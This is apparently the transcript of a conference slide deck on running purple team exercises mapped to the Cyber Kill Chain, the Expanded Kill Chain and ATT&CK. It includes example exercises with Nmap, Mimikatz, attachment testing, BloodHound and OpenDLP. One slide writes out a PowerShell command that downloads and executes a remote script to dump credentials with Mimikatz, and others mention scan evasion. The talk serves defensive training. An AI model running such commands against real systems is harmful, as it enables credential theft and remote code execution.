This document outlines how to conduct Purple Team exercises using the Cyber Kill Chain and Extended Cyber Kill Chain frameworks. It discusses: - Terminology related to purple teaming, red teaming, and blue teaming. - The purple team process of conducting focused penetration testing with clear training objectives for the blue team. - The Cyber Kill Chain and Extended Cyber Kill Chain models and how they can be used for exercises. - Other frameworks like ATT&CK that can aid exercises. - The different phases and teams involved in cyber exercises. - Examples of exercises that could be done using various tools and techniques mapped to the kill chains, like port scanning with Nmap and collecting credentials with Mim

1. @haydnjohnson
How to create Purple
Team exercises with
the CKC & EKC

2. @haydnjohnson
Whoami
Haydn Johnson
Security Analyst | Manager | Purple Teamer
Points (points.com)
@haydnjohnson
Talks: Bsides, Circle City Con, HackFest, SecTor.
NolaCon
Offsec, Purple Team, Gym??
http://www.slideshare.net/HaydnJohnson

3. 3
I work here!

4. @haydnjohnson
Inspiration from
@carnal0wnage - Chris Gates
@indi303 - Chris Nickerson
Relevant Videos:
Purple Teaming the Cyber Kill Chain Practical Exercises for Management
http://2016.video.sector.ca/video/188841307
BruCON 0x08 - Building A Successful Internal Adversarial Simulation Team - C.
Gates & C. Nickerson
https://www.youtube.com/watch?v=Q5Fu6AvXi_A

5. @haydnjohnson
1.
Outline
give a summary of (something).

6. @haydnjohnson
Outline
What is Purple Teaming
❏ All about
Cyber Kill Chain & Extended
❏ Lockheed Martin CKC
❏ Sean Malone EKC
❏ ATT&CK MITRE
Cyber Exercises
❏ Events / Injects
❏ Teams
❏ Phases
❏ Execution in detail
Examples of Purple Teaming
❏ NMap
❏ Mimikatz
❏ Attachment Testing
❏ Table Top
❏ BloodHound
❏ OpenDLP

7. @haydnjohnson
Terminology

8. @haydnjohnson
Terminology
Vulnerability Assessment Person - Run Vuln
Scanner....hey client you suck
Penetration Tester - Metasploit / MSF PRO (FTW)...hey
client you suck
Red Teaming - Phish, move laterally, find “sensitive stuff”,
maybe custom implant...hey client you suck
Purple Teaming - You did all the above, but got to charge
for an extra body and to tell the client how they suck in
person

9. @haydnjohnson
Terminology
Red Teaming - “Red Team engagements are the full
spectrum warfare of security assessments. In a red team
engagement, the consultants attack the client organization
using physical means, social engineering, and
technological avenues. “
From: http://winterspite.com/security/phrasing/

10. @haydnjohnson
Terminology
From: http://winterspite.com/security/phrasing/
Red Teaming

11. @haydnjohnson
From: Chris Nickerson Lares Consulting

12. @haydnjohnson
Terminology
Blue Team
❏ Network defenders
❏ Support
❏ Firewalls | Blinky Boxes
❏ Responders

13. @haydnjohnson
Terminology
Purple Team
❏ Working together to achieve the ultimate goal of
making the organization more secure
❏ different threats & attacker mindset
❏ incident detection and response
❏ policy and procedures
❏ tuning of controls

14. @haydnjohnson

15. @haydnjohnson
2.
Purple Team
Process
what | how

16. @haydnjohnson
Purple Team
❏ Conducting focused pentesting (up to Red
Teaming) with clear training objectives for the
Blue Team.
❏ It isn't a "can you get access to X" exercise it is
a "train the Blue Team on X" exercise. The
pentesting activities are a means to conduct
realistic training.

17. @haydnjohnson
Purple Team
❏ Togetherness
AttackDefend

18. @haydnjohnson
3.
The CKC & ECKC
Cyber Kill Chain
Expanded Cyber Kill Chain

19. @haydnjohnson
The Cyber Kill
Chain
Lockheed Martin
http://www.lockheedmartin.com/us/what-we-do/aerospace-defense/cyber/cyber-kill-chain.html

20. @haydnjohnson
Cyber Kill Chain
❏ Worst Name Ever
❏ “The seven steps of the Lockheed Martin Cyber
Kill Chain® enhance visibility into an attack
and enrich an analyst’s understanding of an
adversary’s tactics, techniques and
procedures.”
http://www.lockheedmartin.com/us/what-we-do/aerospace-defense/cyber/cyber-kill-chain.html

21. @haydnjohnson
Cyber Kill Chain

22. @haydnjohnson
Cyber Kill Chain
❏ The Idea is great
❏ This is an integrated, end-to-end process
described as a “chain” because any one
deficiency will interrupt the entire process.
❏ AKA:
Any deficiency in the attackers chain, will
interrupt the entire process

23. @haydnjohnson
Cyber Kill Chain
https://countuponsecurity.com/tag/kill-chain/

24. @haydnjohnson
Cyber Kill Chain
Road Map
http://www.lockheedmartin.com/content/dam/lockheed/data/corporate/documents/LM-White-Pape
r-Intel-Driven-Defense.pdf

25. @haydnjohnson
The Expanded
Cyber Kill Chain
Sean Malone
https://www.blackhat.com/docs/us-16/materials/us-16-Malone-Using-An-Expanded-Cyber-Kill-Chai
n-Model-To-Increase-Attack-Resiliency.pdf

26. @haydnjohnson
Expanded Cyber Kill Chain
❏ AKA - The Internal Kill Chain
❏ Original CKC focuses primarily on before an
attack gains access
❏ ECKC builds out the methodology once an
attacker is in the network

27. @haydnjohnson
Expanded Cyber Kill Chain
http://www.lockheedmartin.com/us/what-we-do/aerospace-defense/cyber/cyber-kill-chain.html
External Cyber Kill
Chain
Internal Kill Chain
Target Manipulation Kill
Chain

28. @haydnjohnson
From:
https://www.blackhat.com/docs/us-16/materials/us-16-Malone-Using-An-Expanded-Cyber-Kill-Cha
in-Model-To-Increase-Attack-Resiliency.pdf

29. @haydnjohnson
ATT&CK
Another framework!
@MITREattack

30. @haydnjohnson
ATT&CK Framework
a threat modeling methodology and suite of models
for the various phases of an adversary's lifecycle and
platforms that are known to be targeted by cyber
threats
The MITRE ATT&CK Matrix™ is a visualization of the
tactics and techniques.

31. @haydnjohnson
ATT&CK Framework
Looks like:

32. @haydnjohnson
ATT&CK Framework
Looks like:

33. @haydnjohnson
ATT&CK Framework
Great video that explains it in practice:
Hackfest 2016 - Chris Nickerson :
Adversarial Simulation: Why your defenders are the
Fighter Pilots.
https://www.youtube.com/watch?v=flmxbKfIAE4

34. @haydnjohnson
ATT&CK Framework
Attempting to implement

35. @haydnjohnson
4.
Cyber Exercises
MITRE cyber exercise playbook
https://www.mitre.org/sites/default/files/publications/pr_14-3929-cyber-exercise-playbook.pdf

36. @haydnjohnson

37. @haydnjohnson
Events / Injects
Events - generally executed by the Red Team to elicit
responses from the Blue Team in specific phases,
focused on the objectives of the exercise.

38. @haydnjohnson
Different Teams
within cyber exercises

39. @haydnjohnson
Exercises - Teams
ECG GREY
RED BLUE

40. @haydnjohnson
Exercises - Teams
Exercise Control Group
Take information from other teams and make
decision to ensure the exercise is “controlled” and
reaches its goals.
IR Manager
Team Lead
VP
ECG

41. @haydnjohnson
Exercises - Teams
Gray Team / Observers
Observe the Blue Team's reaction or non-reaction and
report back to ECG.
Ongoing process
IR Manager
Team Lead
VP
GREY

42. @haydnjohnson
Exercises - Teams

43. @haydnjohnson
Phases
of cyber exercises

44. @haydnjohnson
Phases of a Cyber Exercise
❏ Plan
❏ Execution
❏ Lessons Learned

45. @haydnjohnson
Exercises - Planning
Preliminary
Meeting
Middle
Meetings
Final
Meeting

46. @haydnjohnson
Exercises - Planning
“By failing to prepare, you are preparing to fail.”
Benjamin Franklin
Everything needs consideration, pros, cons and a
plan!
1. Brainstorming
2. Action Items
3. Budget / Approval

47. @haydnjohnson
Exercises - Planning
Each team needs to know the end goals (except Blue)
Red Team needs to know what injects and when.
Goals:
1. To prevent confusion
2. Finalize Objectives
3. Identify if training is required
4. Decide on Use Cases

48. @haydnjohnson
Exercises - Ideas
Initial Weakness
New technology
New Team
Test assumption
Budget
Devils advocate

49. @haydnjohnson
Exercises - Ideas
https://github.com/aptnotes/data/blob/master/APTnotes.csv

50. @haydnjohnson
Exercises - Execution
❏ Execution
❏ Go Time
❏ Observe, Change, Observe
Be Dynamic

51. @haydnjohnson
Exercise
Control
Group
Red
Team
Training
Audience
Observers
1
RT tasked with
action

52. @haydnjohnson
Exercise
Control
Group
Red
Team
Training
Audience
Observers
1
2
RT tasked with
action
Execute inject /
event

53. @haydnjohnson
Exercise
Control
Group
Red
Team
Training
Audience
Observers
1
2
3
Collects
information
RT tasked with
action
Execute inject /
event

54. @haydnjohnson
Exercise
Control
Group
Red
Team
Training
Audience
Observers
1
2
3
4
Collects
information
Feedback to ECG
RT tasked with
action
Execute inject /
event

55. @haydnjohnson
Exercises - Execution
What if no response?
No Alerts?

56. @haydnjohnson
Exercise
Control
Group
Red
Team
Training
Audience
Observers
!
Check for
hackers.fu

57. @haydnjohnson
Exercise
Control
Group
Red
Team
Training
Audience
Observers
!
Check alert for
mal.exe

58. @haydnjohnson
Exercises - Lessons Learned
❏ What observations were made during the
exercise.
What went well, what didn’t
Positive and negative - constructive

59. @haydnjohnson
Exercises - Lessons Learned
❏ Internally we need to prepare better
❏ Ensure findings are document
❏ Think of more alternative tests

60. @haydnjohnson
Exercises - Lessons Learned
Exercise
Good
Bad
Improvements Follow-up

61. @haydnjohnson
Exercises - Lessons Learned
Collect Information from everyone
Strengthen future exercises
Exercise
Control
Group
Red
Team
Training
Audience
Observers

62. @haydnjohnson
5.
Example exercises
Using CKC & EKC

63. @haydnjohnson
Nmap
Mimikatz
Malicious Attachment Testing
BloodHound
Tabletop Exercise
OpenDLP

64. @haydnjohnson
Port Scanning Detection
Nmap
Internal Kill Chain
External Cyber Kill
Chain OR

65. @haydnjohnson
Example 1 - Nmap
# of People Required: 1
Level of knowledge required: Little
Documentation online: Many
Time to Test Minimal
Disruption to Business None

66. @haydnjohnson
Example 1 - Nmap
Test if Nmap / Port scans can be seen internally or
externally
What do the alerts look like?

67. @haydnjohnson
Example 1 - Nmap
Start Basic
Increase complexity
Fragmentation

68. @haydnjohnson
Example 1 - Nmap
$END POINT SOLUTION catches Nmap
$EPS misses fragmentation / slow scans
Each workstation gives ALERT
Try with Avast, McAfee, Symantec etc

69. @haydnjohnson
Example 1 - Nmap
https://nmap.org/book/man-bypass-firewalls-ids.html

70. @haydnjohnson
Example 1 - Nmap
Why Nmap? APT won’t use Nmap
❏ It is a start
❏ Simple & cheap
❏ Test current technology

71. @haydnjohnson
Example 1 - PowerShell
Advancing the exercise

72. @haydnjohnson
PowerShell Remoting
Mimikatz

73. @haydnjohnson
Example 2- Credentials in Memory
# of People Required: 1 -2
Level of knowledge required: Little
Documentation online: Many
Time to Test Minimal
Disruption to Business None

74. @haydnjohnson
Example 2- Credentials in Memory
Helpdesk / Ops wants a secure way to remotely
manage workstation(s).
RDP | VNC - no thanks
Want to use PowerShell Remoting because easier and
‘secure’
https://blog.netspi.com/powershell-remoting-cheatsheet/

75. @haydnjohnson
Example 2- Credentials in Memory
Requirements
❏ Ease of use
❏ Secure
❏ Auditbility
Research shows this is possible

76. @haydnjohnson
Example 2- Credentials in Memory
Steps:
○ Before PS-Remoting ○ After PS-Remoting

77. @haydnjohnson
Example 2- Credentials in Memory
❏ Need to know for sure
❏ Want to test credentials are safe
❏ See for self
Mimikatz comes in

78. @haydnjohnson
Example 2- Credentials in Memory
Command Run:
powershell "IEX (New-Object
Net.WebClient).DownloadString('http://is.gd/oeoFuI');
Invoke-Mimikatz -DumpCreds | Out-File pre.txt”
http://carnal0wnage.attackresearch.com/2013/10/dumping-domains-worth-of-pa
sswords-with.html

79. @haydnjohnson
Example 2- Credentials in Memory
Dumping credentials

80. @haydnjohnson
Example 2- Credentials in Memory
PS-Remote

81. @haydnjohnson
Example 2- Credentials in Memory
Compare

82. @haydnjohnson
Example 2 - Credentials in
Memory
Thumbs up success gift] / image

83. @haydnjohnson
Example 2- Credentials in Memory
Success!
❏ Need to document
❏ Have justification to Implement!
❏ Security Gives sign off!

84. @haydnjohnson
email filter
Malicious
Attachment
Testing
External Cyber Kill
Chain

85. @haydnjohnson
Example 3 - Malicious Attachment
Testing
<Email> is great at filtering malicious emails,
attachments etc.
We want to see what gets through to know what to
expect
“What could get through”

86. @haydnjohnson
Example 3 - Malicious Attachment
Testing
Malicious File Maker
@carnal0wnage
https://github.com/carnal0wnage/malicious_file_make
r

87. @haydnjohnson
Example 3 - Malicious Attachment
Testing
Automates sending

88. @haydnjohnson
Example 3 - Malicious Attachment
Testing
AV Pop-Ups

89. @haydnjohnson
Example 3 - Malicious Attachment
Testing

90. @haydnjohnson
Example 3 - Malicious Attachment
Testing

91. @haydnjohnson
Example 3 - Malicious Attachment
Testing
Not script kiddie friendly

92. @haydnjohnson
Example 3 - Malicious Attachment
Testing
Some attachments you cannot send

93. @haydnjohnson
Example 3 - Malicious Attachment
Testing
Receiving file attachments

94. @haydnjohnson
Example 3 - Malicious Attachment
Testing
The goal:
❏ Confirm email attachment filtering
❏ Confirm attachments that bypass
❏ Document findings for reference
❏ Potential defenses / future steps

95. @haydnjohnson
Example 3 - Malicious Attachment
Testing
Which allows us:
❏ Potential tuning to block file types
❏ Research file types for use in the wild
❏ Identification of compensating controls

96. @haydnjohnson
BloodHound
Domain Admin
Paths
Internal Kill Chain

97. @haydnjohnson
Example 4 - Domain Admin Paths
# of People Required: 1 -2
Level of knowledge required: Enough to install the tool
Documentation online: Installation instructions
Time to Test Minimal
Disruption to Business Potential to pop alerts

98. @haydnjohnson
Example 4 - Domain Admin Paths
Goals:
❏ Identify Domain Admins
❏ Identify derivative admins
❏ Weakness in the chain of trust

99. @haydnjohnson
Example 4 - Domain Admin Paths
BloodHound command:
https://blog.stealthbits.com/attacking-active-directory-permissions-with-bloodhound/
https://wald0.com/?p=112
https://github.com/BloodHoundAD/BloodHound/wiki/Getting-started

100. @haydnjohnson
Example 4 - Domain Admin Paths
Tested with helpdesk access

101. @haydnjohnson
Example 4 - Domain Admin Paths
Mystery account “SUPERHERO” identified via ACLs

102. @haydnjohnson
Example 4 - Domain Admin Paths
❏ Follow up on mystery account
❏ Create Ticket
❏ Does it require the access it has?
Test with a group that has less access

103. @haydnjohnson
Table Top Exercise
Internal Kill Chain
External Cyber Kill
Chain
Target Manipulation Kill
Chain

104. @haydnjohnson
Example 4 - Table Top Exercise
# of People Required: Many
Level of knowledge required: Varied
Documentation online: Yes
Time to Test Long term
Disruption to Business 1 day +

105. @haydnjohnson
Example 4 - Table Top Exercise
Goals:
❏ Raise awareness
❏ Practice before it happens

106. @haydnjohnson
Example 4 - Table Top Exercise
Pre Hack
During
Post
https://www.sans.org/reading-room/whitepapers/analyst/killing-advanced-threats-tracks-intelligent-
approach-attack-prevention-35302

107. @haydnjohnson
Example 4 - Table Top Exercise
Pre Hack
$Group Threaten Company
https://www.sans.org/reading-room/whitepapers/analyst/killing-advanced-threats-tracks-intelligent-
approach-attack-prevention-35302

108. @haydnjohnson

109. @haydnjohnson
Example 4 - Table Top Exercise
Response A

110. @haydnjohnson
Example 4 - Table Top Exercise
Response B

111. @haydnjohnson
Example 4 - Table Top Exercise
ECURITY
C - LEVEL
PR
IT

112. @haydnjohnson
Example 4 - Table Top Exercise
Technical Response
IR
Hardening
Public Response
Disclosure
Insurance

113. @haydnjohnson
Example 4 - Table Top Exercise
Do this for each stage:
❏ Pre Hack
❏ During
❏ Post Hack

114. @haydnjohnson
OpenDLP
Lateral Movement
Target Manipulation Kill
Chain

115. @haydnjohnson
Example 5 - Lateral Movement
# of People Required: 1-2
Level of knowledge required: Ability to find network shares
Documentation online: Yes
Time to Test hours
Disruption to Business Minimal

116. @haydnjohnson
Example 5 - Lateral Movement
Goals:
❏ Is there sensitive information at rest?
❏ What data could be accessed on network shares

117. @haydnjohnson
Please note
❏ Exercises do not have to be ‘offsec’ tool focused
❏ Attacker mindset is important
❏ Testing assumptions

118. @haydnjohnson
Example 5 - Lateral Movement
OpenDLP
❏ Data Loss prevention tool
❏ Identifies sensitive data at rest on thousands of
systema
❏ Not easy to install
https://github.com/ezarko/opendlp

119. @haydnjohnson
Example 5 - Lateral Movement
OpenDLP Video Reference
Bsides Cleveland 2017
Blue-Teamin' on a Budget [of Zero]
https://www.youtube.com/watch?v=77M0aO2F2fU

120. @haydnjohnson
Example 5 - Lateral Movement
❏ Download OVA
❏ Transfer sc.exe from XP 32bit
❏ Install browser sert
❏ Start apache
❏ connect

121. @haydnjohnson
Example 5 - Lateral Movement
Issues with install:
❏ sc.exe 32bit
❏ Accessing web server
❏ Solution:
XP
http://www.makeuseof.com/tag/download-wi
ndows-xp-for-free-and-legally-straight-from-
microsoft-si/

122. @haydnjohnson
Example 5 - Lateral Movement
Import cert

123. @haydnjohnson
Example 5 - Lateral Movement
Looks like this

124. @haydnjohnson
Example 5 - Lateral Movement
❏ PII
❏ Credit card data etc

125. @haydnjohnson
Example 5 - Lateral Movement
Report looks like:

126. @haydnjohnson
Example 5 - Lateral Movement
❏ This is still a work in progress.
❏ Wondering how I can create a process out of it

127. @haydnjohnson
Conclusion

128. @haydnjohnson
Top Takeaways
Don’t Assume
Be Proactive
Take action

129. 129
Questions, Comments, Ask away
Thank you OWASP AUSTIN for
having me!